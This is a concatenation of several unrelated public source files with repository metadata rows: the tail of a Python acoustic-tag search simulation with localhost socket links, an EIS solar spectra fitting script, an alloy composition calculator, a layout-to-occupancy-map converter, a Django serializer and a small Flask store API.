if data[2][0] > (xll + (factor * 1.50)):
count[2] += data[0]
measured_data[2].append(data[0])
time[2].append(data[1])
# print ("east")
# west
if data[2][0] < (xll + (factor * .50)):
count[3] += data[0]
measured_data[3].append(data[0])
time[3].append(data[1])
# print ("west")
# print ("time: ")
# print (time)
# print ("Measured_data : ")
# print (measured_data)
result = []
# north
avg_rate = find_max_7_values_avg_measurement(time[0], measured_data[0])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
# south
avg_rate = find_max_7_values_avg_measurement(time[1], measured_data[1])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
# east
avg_rate = find_max_7_values_avg_measurement(time[2], measured_data[2])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
# west
avg_rate = find_max_7_values_avg_measurement(time[3], measured_data[3])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
data_to_be_sent = ",".join(str(i) for i in result)
clientsocket.send(str.encode(data_to_be_sent))
elif cmd[0] == 'get_tags_adjacent':
agent = agentList[0]
factor = 2
xll = (int(cmd[1]) - 1) * factor * 2
yll = (int(cmd[2]) - 1) * factor * 2
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
probability = []
unique = []
count = [0, 0, 0, 0]
time = [[], [], [], []]
total_count = 0
for data in allDetectionData: # tag ID,time,agent pos,bin
if (data[3] == bin) and (not data[0] in unique):
total_count += 1
unique.append(data[0])
# north
if data[2][1] > (yll + (factor * 1.50)):
count[0] += 1
time[0].append(data[1])
# print ("north")
# south
if data[2][1] < (yll + (factor * .50)):
count[1] += 1
time[1].append(data[1])
# print ("south")
# east
if data[2][0] > (xll + (factor * 1.50)):
count[2] += 1
time[2].append(data[1])
# print ("east")
# west
if data[2][0] < (xll + (factor * .50)):
count[3] += 1
time[3].append(data[1])
# print ("west")
print (time)
print (count)
result = []
# north
avg_rate = find_max_5_values_avg(time[0])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
# south
avg_rate = find_max_5_values_avg(time[1])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
# east
avg_rate = find_max_5_values_avg(time[2])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
# west
avg_rate = find_max_5_values_avg(time[3])
# print ("Average value")
# print (avg_rate)
result.append(avg_rate)
data_to_be_sent = ",".join(str(i) for i in result)
# print ("The data is : ")
# print (data_to_be_sent)
clientsocket.send(str.encode(data_to_be_sent))
elif cmd[0] == 'get_tags_adjacent_new':
agent = agentList[0]
factor = 2
xll = (int(cmd[1]) - 1) * factor * 2
yll = (int(cmd[2]) - 1) * factor * 2
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
probability = []
unique = []
count = [0, 0, 0, 0]
time = [[], [], [], []]
total_count = 0
for data in allDetectionData: # tag ID,time,agent pos,bin
if (data[3] == bin) and (not data[0] in unique):
total_count += 1
unique.append(data[0])
# north
if data[2][1] > (yll + (factor * 1.50)):
count[0] += 1
time[0].append(data[1])
# print ("north")
# south
if data[2][1] < (yll + (factor * .50)):
count[1] += 1
time[1].append(data[1])
# print ("south")
# east
if data[2][0] > (xll + (factor * 1.50)):
count[2] += 1
time[2].append(data[1])
# print ("east")
# west
if data[2][0] < (xll + (factor * .50)):
count[3] += 1
time[3].append(data[1])
# print ("west")
print (count)
data_to_be_sent = ",".join(str(i) for i in count)
# print ("The data is : ")
# print (data_to_be_sent)
clientsocket.send(str.encode(data_to_be_sent))
elif cmd[0] == 'cell_lambda':
agent = agentList[0]
if len(cmd) < 2:
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1]) - 1
clientsocket.send(str.encode(str(agent.belief_map[bin])))
else:
# bin = E.getAbstractPos(int(cmd[1]), int(cmd[2])) - 1
bin = 5 * (int(cmd[1]) - 1) + (int(cmd[2])) - 1
clientsocket.send(str.encode(str(agent.belief_map[bin])))
det_count[0] = 0
clientsocket.close()
if len(cmd)>=1:
return
'''
psuedo code
create grid world
generate tag positons based on probability map and total number of fish N
create agents
simulation:
1. detect tags
2. update tag.lastPing
3. updte agent dynamics
'''
def draw(x):
plt.figure(1)
plt.axis('scaled')
plt.grid(True)
plt.plot(x[0], x[1], 'r.')
plt.xlim([0, E.x_range])
plt.ylim([0, E.y_range])
plt.xticks(np.arange(0,E.x_range,E.x_range/5.0))
plt.yticks(np.arange(0,E.y_range,E.y_range/5.0))
plt.draw()
def drawAgent(x,r=None):
plt.figure(1)
plt.axis('scaled')
plt.grid(True)
plt.plot(x[0], x[1], 'bo')
if r==None:
pass
else:
circ=plt.Circle((x[0], x[1]), r, color='b', fill=False)
plt.gcf().gca().add_artist(circ)
plt.xlim([0, E.x_range])
plt.ylim([0, E.y_range])
plt.xticks(np.arange(0,E.x_range,E.x_range/5.0))
plt.yticks(np.arange(0,E.y_range,E.y_range/5.0))
plt.draw()
def iterative_average(x,n,ave):
return ave+(x-ave)/(n+1)
def simulate_dynamics(agent,u,tspan,dt):
inc = agent.state
for i in np.linspace(tspan[0],tspan[1],int((tspan[1]-tspan[0])/dt)):
inc+=agent.dynamics(inc,u)*dt#+world.flow(agent.getPos())*dt
return inc
def f1_plan(x0, x, N):
u = np.zeros(N)
xsim = x0.copy()
for n in range(N):
e = x-xsim
angle = np.arctan2(e[1], e[0])
u[n] = angle
xsim += 0.005*np.array([np.cos(u[n]), np.sin(u[n])])
return u
def search(wp_list,X):
#X is the center position of one of the 25 cells
offset=.375*x_range/5
wp_list.append(np.array(X))
wp_list.append(np.array(X)+np.array([-offset,offset]))
wp_list.append(np.array(X)+np.array([offset,offset]))
wp_list.append(np.array(X)+np.array([offset,-offset]))
wp_list.append(np.array(X)+np.array([-offset,-offset]))
wp_list.append(np.array(X) + np.array([-offset, offset]))
wp_list.append(np.array(X))
return wp_list
def wp_track(x,wp_list):
global searchComplete
e = np.array(wp_list[0])-x
if np.linalg.norm(e) < x_range/50.0 and len(wp_list) > 1:
#print(wp_list)
del wp_list[0]
if len(wp_list) == 1:
searchComplete=True
return wp_list, 1*np.arctan2(e[1],e[0])
######################## motion models ###################################
def m1_step(x,u):
return 1*np.array([np.cos(u), np.sin(u)])
def m2_step(x,u):
# |0 0 1 0|x |0 0|
# |0 0 0 1|y + |0 0|u1
# |0 0 -a 0|vx |1 0|u2
# |0 0 0 -b|vy |0 1|
a=.25
return np.matmul(1*np.array([[0, 0, 1, 0],[0,0,0,1],[0,0,-a,0],[0,0,0,-a]]),x)+np.matmul(1*np.array([[0,0],[0,0],[1,0],[0,1]]),u)
def m3_step(x,u):
return np.array([max(min(u[0],1),-1),max(min(u[1],1),-1)])
############################# test functions ###############################################
def rastrigin(x,y):
return 20+x**2+y**2-10*(np.cos(2*np.pi*x)+np.cos(2*np.pi*y))
def rosenbrock(x,y):
a,b=(10,.001)
return b*(y-x**2)**2+(a-x)**2
def gaussianSum(x,y):
r1 = np.array([.75*x_range,.45*y_range])
r2 = np.array([.3*x_range,.7*y_range])
loc = np.array([x,y])
return 10*np.exp(-0.05*np.linalg.norm(loc-r1)**2)+15*np.exp(-0.1*np.linalg.norm(loc-r2)**2)
def tagField(tagData,pos,t,time_step,sensorRange):
#last_ping=tagData[:,0],posx=tagData[:,1],posy=tagData[:,2],posz=tagData[:,3],delay=tagData[:,4],ID=tagData[:,5],bin=tagData[:,6]=tagData
#diff=tagData[:,1:3]-np.array([pos[0],pos[1]])
distance=np.linalg.norm(tagData[:,1:3]-np.array([pos[0],pos[1]]),axis=1)
eps=time_step/100.0
c1=(np.fmod(t,tagData[:,4]+eps)-(tagData[:,0]+tagData[:,4]))<time_step
c2=(np.fmod(t,tagData[:,4]+eps)>(tagData[:,0]+tagData[:,4]))
pinging = np.logical_and(c1,c2)
dtSet= np.logical_and(distance<sensorRange,pinging)
return tagData[np.where(pinging)[0],:],tagData[np.where(dtSet)[0],5],np.sum(dtSet)#pinging,detection set,detectionNum
density_map = np.array([0.1, 0.1, 0.4, 0.3, 0.2,
0.1, 0.3, 0.3, 0.1, 0.3,
0.2, 0.3, 0.3, 0.2, 0.1,
0.3, 0.9, 0.3, 0.2, 0.1,
0.2, 0.3, 0.2, 0.1, 0.1])
#################################### simulation settings ###################################
N = 1000 #how many tags present
simtime=1000 #max simulation time
numAgents=1 #number of agents exploring
sensorRange=2
x_range=20.0 #grid size
y_range=20.0
spacing=(1,1)#(.5,.5) #spacing between points for visualizing fields
searchMethods = ["MIDCA","SUSD","ERGODIC_DI","DEMO","ERGODIC_SI"]
method = searchMethods[0]
fields= ["tag","gassian sum","rosenbrock","rastrigin"]
#fieldMax = [(5.5,14,1.5),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_100
#fieldMax = [(5.5,14,2),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_200
#fieldMax = [(5.5,14,4.1),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_500
fieldMax = [(5.5,14,6),(.3*x_range,.7*y_range,14)]#tag field absolute max 9.5 # for tag_1000
field = fields[0]
measurement_time = 2.0
time_step=.5
#start_pos=(.05*x_range,.1*y_range)
"""
start_pos = [(4.361675414742551382e+00, 1.458277069766090328e+01),
(1.545820006278236569e+01, 6.457247090829543623e+00),
(6.295868290928718913e-01, 7.231587833833630796e+00),
(1.125840547944832792e+01, 4.275635236417141272e-01),
(1.547922926485634232e+00, 4.900255414078060312e+00),
(1.510704267728113237e+01, 1.783478215173388648e+01),
(2.204755346558018303e-01, 6.173268062869025741e+00),
(4.958469349586305697e+00, 4.716507947006558510e+00),
(1.479491107030286301e+01, 1.459564048874953457e+01),
(3.171471926407209985e+00, 1.005076470181938575e+01),
(1.234584097168078287e+01, 6.461087057506860631e+00),
(1.067132595610898349e+01, 1.024013704378120160e+01),
(2.627585809888457469e+00, 1.260149797724160514e+01),
(4.046709532503120599e+00, 1.067246776102524386e+01),
(1.408113055270808722e+01, 1.423915807887335561e+01),
(1.414334725656964054e+01, 1.920331742981397838e+01),
(8.702805949851414979e+00, 1.927219991502269991e+01),
(1.902459420257870448e+01, 1.459444585671132621e+01),
(1.071787563199973192e+01, 6.014617171762742132e+00),
(7.813659480510352751e+00, 3.109500212981364253e+00)
]
"""
start_pos = (1.545820006278236569e+01, 6.457247090829543623e+00)
show_only_when_pinging=False
stopOnMax = True
visualize = True
syncronize = True
logData=True
###############################################################################################
t=0
last_meas=t
run=False
running=False
searchComplete=False
updateGP=False
latestMeas=0
u=0
taglist=[]
agentList=[]
tagx=np.zeros(N)
tagy=np.zeros(N)
"""
for i in range(N):
#taglist.append(AcousticTag(i,last_ping=-np.random.rand()),ping_delay=max(2,30*np.random.randn())) # most realistic
taglist.append(AcousticTag(i,last_ping=-17*np.random.rand())) # more realistic (pings are not aligned in time)
# taglist.append(AcousticTag(i)) #better for understanding because pings are aligned in time and all have same ping interval
x,y,_ = taglist[i].pos
tagx[i]=x
tagy[i]=y
"""
E = Grid(taglist,x_range=x_range, y_range=y_range)
if field == fields[0]:
taglist= E.loadTagList("testField1_1000") #E.setMap(density_map)
tagData=np.genfromtxt("testField1_1000.csv",delimiter=",")
#E.saveTagList("tags")
for i in range(numAgents):
s= AcousticReciever(np.array([0,0,0]),sensorRange)
if method == searchMethods[2]:
#agentList.append(Agent(np.array([np.random.rand()*x_range,np.random.rand()*y_range,0,0]),s,E,dim=2))
agentList.append(Agent(np.array([start_pos[0],start_pos[1],0,0]),s,E,dim=2))
agentList[i].dynamics=m2_step
u=[0,0]
elif method == searchMethods[4]:
#agentList.append(Agent(np.array([np.random.rand()*x_range,np.random.rand()*y_range,0,0]),s,E,dim=2))
agentList.append(Agent(np.array([start_pos[0],start_pos[1]]),s,E,dim=2))
agentList[i].dynamics=m3_step
u=[0,0]
else:
#agentList.append(Agent(np.array([np.random.rand()*x_range,np.random.rand()*y_range]),s,E,dim=2))
agentList.append(Agent(np.array([start_pos[0],start_pos[1]]),s,E,dim=2))
agentList[i].dynamics=m1_step
for i in range(len(taglist)):
x,y,_ = taglist[i].pos
tagx[i]=x
tagy[i]=y
if field == fields[1]:
nx_bins = int(x_range/spacing[0])
ny_bins = int(y_range/spacing[1])
x_bins=np.array(range(nx_bins))*x_range/nx_bins
y_bins=np.array(range(ny_bins))*y_range/ny_bins
plottingPoints = [(idx+spacing[0]/2.0,idy+spacing[1]/2.0,gaussianSum(idx+spacing[0]/2.0,idy+spacing[1]/2.0)) for idx in x_bins for idy in y_bins]
plottingPoints = np.array(plottingPoints)
plottingPoints.shape=(nx_bins,ny_bins,3)
if field == fields[2]:
nx_bins = int(x_range/spacing[0])
ny_bins = int(y_range/spacing[1])
x_bins=np.array(range(nx_bins))*x_range/nx_bins
y_bins=np.array(range(ny_bins))*y_range/ny_bins
plottingPoints = [(idx+spacing[0]/2.0,idy+spacing[1]/2.0,rosenbrock(idx+spacing[0]/2.0,idy+spacing[1]/2.0)) for idx in x_bins for idy in y_bins]
plottingPoints = np.array(plottingPoints)
plottingPoints.shape=(nx_bins,ny_bins,3)
if field == fields[3]:
nx_bins = int(x_range/spacing[0])
ny_bins = int(y_range/spacing[1])
x_bins=np.array(range(nx_bins))*x_range/nx_bins
y_bins=np.array(range(ny_bins))*y_range/ny_bins
plottingPoints = [(idx+spacing[0]/2.0,idy+spacing[1]/2.0,rastrigin(idx+spacing[0]/2.0,idy+spacing[1]/2.0)) for idx in x_bins for idy in y_bins]
plottingPoints = np.array(plottingPoints)
plottingPoints.shape=(nx_bins,ny_bins,3)
#draw((tagx,tagy))
'''
for t in range(N):
draw(taglist[t].pos)
#plt.pause(.1)
'''
# simulation
#input('Enter to begin simulation')
######################### socket threads ###############################################
# create an INET, STREAMing socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if method == searchMethods[2] or method == searchMethods[4]:
# connect to ergodic controller
sock.connect(('localhost', 8080))
if method == searchMethods[2] or method == searchMethods[4] and syncronize:
sock.send(str.encode(str(x_range)))
if method == searchMethods[2] and not syncronize:
xthread = threading.Thread(target=ErgodicComLink)
xthread.start()
if method == searchMethods[4] and not syncronize:
xthread = threading.Thread(target=ErgodicComLink2)
xthread.start()
if method == searchMethods[0] and syncronize:
# now do something with the clientsocket
# in this case, we'll pretend this is a threaded server
sock.bind(('127.0.0.1', 5700))
sock.listen(5)
else:
# now do something with the clientsocket
# in this case, we'll pretend this is a threaded server
xthread = threading.Thread(target=MidcaComLink)
xthread.start()
while not running:
pass
##########################################################################
if method==searchMethods[3] or method==searchMethods[0]:
wp_list = [[],[],[]]
#wp_list[0] = search(wp_list[0], [.3*x_range, .3*y_range])
#wp_list[0] = search(wp_list[0], [.3*x_range, .7*y_range])
#wp_list[0] = search(wp_list[0], [5.5, 14])
if method==searchMethods[3] or method==searchMethods[0]:
wp_list = [[],[],[]]
for i in range(len(agentList)):
agent=agentList[i]
pos=agent.getPos()
wp_list[i] = [[pos[0], pos[1]]]
det_count=[0,0,0]
################################################ simulation loop ####################################
endSim=False
maxMeas=0
while t<=simtime:#or running: #change to better simulation stopping criteria
posx=np.zeros(numAgents)
posy=np.zeros(numAgents)
pinging_x =np.zeros(1)
pinging_y =np.zeros(1)
#print(t)
for i in range(len(agentList)):
agent=agentList[i]
pos=agent.getPos()
#state = agent.getPos()#
#srange=agent.sensor.range
if method==searchMethods[3] or method==searchMethods[0]:
wp_list[i], u = wp_track(np.array(pos), wp_list[i])
MidcaIntegrator(agent, updateGP)
#print(t, pos, u, latestMeas)
if updateGP:
updateGP = False
#print(t,pos,u,latestMeas)
if method == searchMethods[2] and syncronize:
u=doubleIntegratorErgodicControl(agent,updateGP)
#print(t,pos,u,latestMeas)
if updateGP:
updateGP=False
if method == searchMethods[4] and syncronize:
u = singleIntegratorErgodicControl(agent, updateGP)
print(t, pos, u, latestMeas)
if updateGP:
updateGP = False
state=simulate_dynamics(agent,u, [0,time_step],.1)
dets=agent.updateAgent(state,t)
pos=agent.getPos()
if field == fields[0]:
pinging,detSet,dets2=tagField(tagData,pos,t,time_step,sensorRange)
#print(t,pinging.shape,dets,dets,detSet,agent.sensor.detectionSet)
allDetectionData = agent.sensor.detectionList # history of every tag detection. includes (tag ID,time,agent pos,bin)
det_count[i]+=dets
if field == fields[3]:
latestMeas=rastrigin(pos[0],pos[1])
if last_meas+measurement_time<=t:
updateGP = True
elif field == fields[2]:
latestMeas=rosenbrock(pos[0],pos[1])
if last_meas+measurement_time<=t:
updateGP = True
elif field == fields[1]:
latestMeas=gaussianSum(pos[0],pos[1])
bin = E.getAbstractPos(pos[0], pos[1]) - 1
allMeasurementData.append([latestMeas, t, [pos[0], pos[1]], bin])
if latestMeas >= fieldMax[1][2]:
endSim=True
if last_meas+measurement_time<=t:
updateGP = True
elif field == fields[0]:
if last_meas+measurement_time<=t:
updateGP = True
bin=E.getAbstractPos(pos[0],pos[1])-1
dtSet=agent.sensor.detectionSet
rate_meas = len(dtSet)*1.0/measurement_time
latestMeas=rate_meas
if latestMeas >= fieldMax[0][2]:
endSim=True
agent.belief_count[bin]+=1
agent.belief_map[bin]= iterative_average(rate_meas,agent.belief_count[bin],round(agent.belief_map[bin],3)) #iteratively average rate measurement
if len(agent.sensor.detectionSet)>0:
#print("agent ",i,", rate = ",rate_meas,",average rate = ",agent.belief_map[bin], " in bin ", bin)
#print(last_meas,t,dtSet)
agent.sensor.detectionSet=set()
posx[i]=pos[0]
posy[i]=pos[1]
plt.clf()
if last_meas+measurement_time<=t:
last_meas=t
if field == fields[0]:
for tag in taglist:
if show_only_when_pinging:
if tag.pinging(t):
x,y,_ = tag.pos
pinging_x=np.append(pinging_x,x)
pinging_y=np.append(pinging_y,y)
tag.updatePing(t)
if show_only_when_pinging and visualize:
draw((pinging_x,pinging_y))
elif visualize:
draw((tagx,tagy))
if (field == fields[1] or field == fields[2] or field == fields[3]) and visualize:
updateGP = True
sensorRange=None
plt.contourf(plottingPoints[:,:,0], plottingPoints[:,:,1],plottingPoints[:,:,2], 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
if maxMeas<latestMeas:
maxMeas=latestMeas
if endSim and stopOnMax:
break
t+=time_step
if visualize:
drawAgent((posx,posy),r=sensorRange)
plt.pause(0.00001) #plt.pause(time_step)
################################################ end simulation loop ####################################
################################################ final plots ######################################
run=False
if method==searchMethods[2] or method==searchMethods[4]:
sock.send("end ".encode('utf-8'))
#input('done')
if field == fields[0]:
draw((tagx,tagy))
drawAgent((posx,posy),r=sensorRange)
for i in range(len(agentList)):
agent=agentList[i]
print("agent ",i," rate estimates")
agent.belief_map.shape=(5,5)
print(np.flip(agent.belief_map,0))
print("and measurements taken per cell")
agent.belief_count.shape=(5,5)
print(np.flip(agent.belief_count,0))
print("True probability density map")
E.p.shape=(5,5)
print(np.flip(E.p,0))
#spacing=(50,50)
"""
print("Rate field approximation for sensor with range",sensorRange," spaced at intervals of",spacing)
approx,pnts=E.approximateField(measurement_time,spacing=spacing,sensorRange=sensorRange,get_points=True)
#print(np.round(approx,decimals=2))
plt.figure(2)
plt.axis('scaled')
plt.grid(True)
#print('\n',pnts[:,:,0],'\n',pnts[:,:,1])
#plt.plot(pnts[:,:,0].flatten(), pnts[:,:,1].flatten(), 'r.',cmap='coolwarm')
plt.contourf(pnts[:,:,0], pnts[:,:,1], np.flip(np.round(approx,decimals=2),(0,1)).transpose(), 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
cbar = plt.colorbar()
cbar.set_label('Detection rate')
"""
if field == fields[1] or field == fields[2] or field == fields[3]:
plt.contourf(plottingPoints[:,:,0], plottingPoints[:,:,1],plottingPoints[:,:,2], 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
drawAgent((posx,posy))
plt.figure(2)
plt.axis('scaled')
plt.grid(True)
plt.contourf(plottingPoints[:,:,0], plottingPoints[:,:,1],plottingPoints[:,:,2], 20, cmap='coolwarm')# cmap='inferno'), cmap='RdGy')
cbar = plt.colorbar()
cbar.set_label('heat map')
plt.xlim([0, x_range])
plt.ylim([0, y_range])
plt.xticks(np.arange(0,x_range,spacing[0]))
plt.yticks(np.arange(0,y_range,spacing[1]))
plt.draw()
plt.pause(0.00001)
if logData:
f=open("log.txt",'a')
f.write(field+","+str(t)+","+str(agent.getPos())+","+str(latestMeas)+"\n")
f.close()
print(str(t)+","+str(agent.getPos())+","+str(latestMeas),", max val: ",maxMeas)
sock.close()
print('done')
| UTF-8 | Python | false | false | 50,107 | py | 49 | fieldComparisonMidca.py | 23 | 0.475223 | 0.42968 | 0 | 1,334 | 35.555472 | 161 |
wtbarnes/tutorial-notebooks | 3,908,420,285,094 | 045fb49f2bdd37ee06fe9784377955c594e92578 | 6a58661ebe27bf45540c7f1d8d4554cb298e5a47 | /2021_HinodeIRIS/fit-eis-data.py | 6ba5cadb45d4ba65fe24ff5e7cc50b9ab0e4a7e3 | [
"MIT"
] | permissive | https://github.com/wtbarnes/tutorial-notebooks | 44da1cf9e4631fd5a579a670832c7ee2f6e86ad1 | 74e8a5305d7ccfe2cfb99c13efbff0391e910a62 | refs/heads/master | "2022-07-24T00:37:48.406325" | "2022-07-11T23:09:33" | "2022-07-11T23:09:33" | 155,681,308 | 0 | 0 | MIT | true | "2018-11-01T07:58:03" | "2018-11-01T07:58:03" | "2018-10-30T13:34:36" | "2018-10-30T13:34:34" | 949 | 0 | 0 | 0 | null | false | null | """
Download level 1 EIS HDF5 files for 2021-04-24 and then fit the
Fe XII 195.119 profile to produce level 3 FITS files
"""
import eispac
import eispac.net # This registers the EIS NRL client
from sunpy.net import Fido, attrs as a
if __name__ == '__main__':
# Download the level 1 data
q = Fido.search(
a.Time('2021-04-24 04:00:00','2021-04-24 05:00:00'),
a.Instrument('EIS'),
a.Physobs.intensity,
a.Source('Hinode'),
a.Provider('NRL'),
a.Level('1'),
)
files = Fido.fetch(q)
files = sorted(files)
# Read in the fitting templates
template_names = [
'fe_12_195_119.1c.template.h5',
]
templates = [eispac.read_template(eispac.data.get_fit_template_filepath(t)) for t in template_names]
# Fit level 1 data using each template and save out the intensity
for t in templates:
cube = eispac.read_cube(files[0], window=t.central_wave)
fit_res = eispac.fit_spectra(cube, t, ncpu='max')
m = fit_res.get_map(measurement='intensity')
m.save(f"data/eis_{'_'.join(m.measurement.lower().split())}.fits", overwrite=True) | UTF-8 | Python | false | false | 1,140 | py | 9 | fit-eis-data.py | 2 | 0.628947 | 0.577193 | 0 | 33 | 33.575758 | 104 |
KoyamaLab/composition | 15,977,278,345,565 | d372ba0d003c92d4e4f0243be3eb99afb0a62c8b | 85eeb016eb23707af6efc5bb93c92c2f4f547af4 | /composition.py | a18614bfccc93a4e70c8660bd91e67e4e4f70059 | [] | no_license | https://github.com/KoyamaLab/composition | 1d502ebf217d54a6c3fe5dcd3f35c35ab4b074a5 | c836b453b784c613aa1d89518accb823917ec28a | refs/heads/master | "2020-04-06T06:11:48.536219" | "2016-11-14T12:55:01" | "2016-11-14T12:55:01" | 73,703,645 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Calculate composition of alloy
#
# arguments:
# argv[0] : dictionary, { 'element_name': element_composition, ... }
# argv[1] : float, alloy_weight [g]
import sys
from elements import ELEMENTS
def debug(arg):
print(arg)
mass = arg[1]
t = int(arg[2])
elms = {}
for i in range(t):
elms.update({arg[3+i]:float(arg[3+i+t])})
print(elms)
def composition(arg):
mol_mass = 0
mass = float(arg[1]) # 最終生成質量
t = int(arg[2]) # t元系
elms = {}
for i in range(t):
elms.update({arg[3+i]:float(arg[3+i+t])})
for name, val in elms.items():
elem = ELEMENTS[name]
mol_mass += elem.mass * val
for name, val in elms.items():
elem = ELEMENTS[name]
print(elem.name, mass / mol_mass * val * elem.mass)
if __name__ == "__main__":
#debug(sys.argv)
composition(sys.argv)
| UTF-8 | Python | false | false | 953 | py | 2 | composition.py | 1 | 0.547492 | 0.533618 | 0 | 41 | 21.609756 | 68 |
sguttikon/openai-rosbot-env | 2,293,512,584,441 | c252fac22c38a2f1b3c69f9b58327ef06010c0fc | 2a6f9db66bea745ec6ad33ee59e1d557b07e27bf | /gazebo_models/indoor_layouts/src/layout_to_occpmap.py | 1865c4c7b85eaf0622320dc39db3b4a76d432478 | [
"Apache-2.0"
] | permissive | https://github.com/sguttikon/openai-rosbot-env | bd958b6614e5a4ffa3f69caba18b2b4d97d3b662 | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | refs/heads/master | "2022-12-30T21:09:00.861597" | "2020-10-23T19:35:41" | "2020-10-23T19:35:41" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
import argparse
import numpy as np
import cv2 as cv
def get_occupany_map(img: np.ndarray, output_path: str, output_size: tuple):
"""
Convert the HouseExpo indoor layout to occupancy map
Parameters
----------
img: numpy.ndarray
input image
output_path: str
full path (*.pgm) indicating where to store the file
output_size: tuple
the output image shape as (rows, cols)
"""
(rows, cols) = img.shape
# the houseexpo layout has black-background so perform inverse transform
_, thresh_img = cv.threshold(img, 1, 255, cv.THRESH_BINARY_INV)
# find and draw contours i.e, borders
# reference: https://docs.opencv.org/3.4/d4/d73/tutorial_py_contours_begin.html
contours, hierarchy = cv.findContours(thresh_img, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)
cv.drawContours(thresh_img, contours, contourIdx=1, color=100, thickness=3)
# switch colors => 205: unknown, 255: free, 0: occupied
thresh_img = np.where(thresh_img==255, np.uint8(205), thresh_img) # unknown
thresh_img = np.where(thresh_img==0, np.uint8(255), thresh_img) # free
thresh_img = np.where(thresh_img==100, np.uint8(0), thresh_img) # obstacle
# add padding to borders to make the output have equal width and height
padding = max(rows, cols) + 50
thresh_img = cv.copyMakeBorder(thresh_img, (padding-rows)//2, (padding-rows)//2, \
(padding-cols)//2, (padding-cols)//2, cv.BORDER_CONSTANT, value=205)
thresh_img = cv.resize(thresh_img, output_size)
# store the image
cv.imwrite(output_path, thresh_img)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert HouseExpo indoor layout images to occupany map')
parser.add_argument('--file_path', dest='file_path', \
required=True, help='full path to layout image')
parser.add_argument('--output_path', dest='output_path', \
required=True, help='full path to output image (*.pgm)')
parser.add_argument('--o_shape', dest='o_shape', type=int, \
default=768, help='output occupancy map shape')
args = parser.parse_args()
img = cv.imread(args.file_path, cv.IMREAD_UNCHANGED)
get_occupany_map(img, args.output_path, (args.o_shape, args.o_shape))
| UTF-8 | Python | false | false | 2,317 | py | 18 | layout_to_occpmap.py | 12 | 0.657315 | 0.634873 | 0 | 56 | 40.375 | 106 |
bdnaeem3/pyBlog | 14,087,492,763,613 | 67564593f5c8a173243e41096114273d8aa3cdb5 | c7b7667f3ac846de17a27ce85cd99bc085bec74b | /blog/serializer.py | ea6eec9edbe13d81a7f7f29ba9ebe8c008253d49 | [] | no_license | https://github.com/bdnaeem3/pyBlog | d603de30ea6a828ff4a8ba137b44bd6e63e06715 | a15fb3b04d45faebaa3b040966851e34ff1a513b | refs/heads/master | "2022-12-01T18:27:34.270006" | "2019-11-26T06:58:24" | "2019-11-26T06:58:24" | 149,322,044 | 0 | 0 | null | false | "2022-11-22T00:23:00" | "2018-09-18T16:51:15" | "2019-11-26T06:58:33" | "2022-11-22T00:22:57" | 1,196 | 0 | 0 | 3 | Python | false | false | from rest_framework import serializers
from . import models
class PostSerializer(serializers.ModelSerializer):
class Meta:
model = models.Post
fields = ('id', 'title', 'content', 'date_created', 'author')
extra_kwargs = {
'author': {
'read_only': True
}
} | UTF-8 | Python | false | false | 336 | py | 9 | serializer.py | 4 | 0.550595 | 0.550595 | 0 | 16 | 20.0625 | 69 |
patrickxrivera/python-flask-rest-api | 7,103,875,952,486 | 757a63de5c831b7b9c26d740c68c1d14ea05ff8b | 9951b6539b96a9505f47294f46d17be2b74cf313 | /section3/src/app.py | d99adcd0472342f3e909f773006e4158611b8303 | [] | no_license | https://github.com/patrickxrivera/python-flask-rest-api | 7421c354ab3a49443de62254cc4261ac7ba3bdf0 | 0d9fef6fe402502f699f0a3b834e7b0f758067c9 | refs/heads/master | "2021-09-20T20:02:17.511575" | "2018-08-15T04:48:33" | "2018-08-15T04:48:33" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Flask, jsonify, request
app = Flask(__name__)
stores = [
{
'name': 'Complete Life Optimization',
'items': [
{
'name': 'Bulletproof Coffe',
'price': 20.99
}
]
}
]
@app.route('/store', methods=['POST'])
def create_store():
request_data = request.get_json()
new_store = {
'name': request_data['name'],
'items': []
}
stores.append(new_store)
return jsonify(new_store)
def find_target_store(target_store_name):
def find(store):
return store['name'] == target_store_name
return find
@app.route('/store/<string:name>')
def get_store(name):
target_store = list(filter(find_target_store(name), stores))
return jsonify({'store': target_store}) if target_store else jsonify({'message': 'No store found with that name.'})
@app.route('/stores')
def get_stores():
return jsonify({'stores': stores})
@app.route('/store/<string:name>/item')
def create_item_in_store(name):
request_data = request.get_json()
for store in stores:
if store['name'] == name:
new_item = {
'name': request_data['name'],
'price': request_data['price']
}
store['items'].append(new_item)
jsonify({'new_item': new_item})
return jsonify({'message': 'store not found'})
@app.route('/store/<string:name>/item')
def get_items_in_store(name):
for store in stores:
if name == store['name']:
return jsonify({'store': store['items']})
return jsonify({ message: 'No store found with that name.' })
app.run(port=5000)
| UTF-8 | Python | false | false | 1,672 | py | 5 | app.py | 2 | 0.56878 | 0.563995 | 0 | 61 | 26.409836 | 119 |
